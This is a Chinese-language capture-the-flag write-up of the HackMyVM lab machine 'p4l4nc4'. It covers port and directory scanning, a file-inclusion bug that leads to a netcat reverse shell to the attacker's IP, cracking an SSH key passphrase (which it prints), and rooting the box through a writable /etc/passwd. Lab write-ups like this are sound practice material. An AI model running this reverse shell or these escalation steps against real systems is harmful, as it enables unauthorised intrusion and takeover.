hackmyvm靶机：p4l4nc4

简介

hackmyvm是一个提供各种漏洞环境的靶场平台，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞，需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标，挑战的目标是获取操作系统的root权限和查看flag。

部署方法

官网：https://hackmyvm.eu/

1.在官网搜索你想要的镜像,然后下载

2.下载好后解压得到.ova的文件，右击选择VMware或者Oracle VirtualBox进行打开

3.在弹出的框中，选择存放的位置，然后点击导入

4.最后等待导入完成，然后启动该虚拟机就可以了

一，信息收集

我是用kali的arp-scan，也可以用namp扫网段扫出来。这里可以用很多工具扫出来之举例一种。

arp-scan -I eth0 -l

• -I 指定eth1这个网卡
• -l 扫描出全部主机

我们知道靶机的IP地址在192.168.31.145后使用namp扫描靶机。

nmap 192.168.31.145 -A -O -p-

开放22，80端口。80端口是标准Apache2默认页面。

扫一下目录。也没什么特别的，突破口在robots.txt

gobuster dir -u http://192.168.31.145 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -x php,jsp,html,db,txt,xml

这里以curl出来的为准。正则还不是很熟练直接抄别人弄出来的了。我就直接给目录是什么了。

/n3gr4

后面还跟一个php页面。也是得要扫出来的。

m414nj3.php

然后就是爆破参数。这里ffuf或者抓包都可以，我就选我熟悉的用了。

文件包含漏洞，直接弹shell了。

busybox nc 192.168.31.224 4444 -e /bin/sh 

拿到之后直接进home目录找用户，这个用户我们可以看私钥，但是不能写入公钥有点可惜。拿私钥爆破一下。

是可以爆破出来的。

friendster

那就可以登录p4l4nc4这个用户了。用私钥登录就好了。

登录上去之后直接跑脚本就好了。可以从/etc/passwd提权。那就直接把密码删了就完了。

nano改一下就好了。这样就拿到root了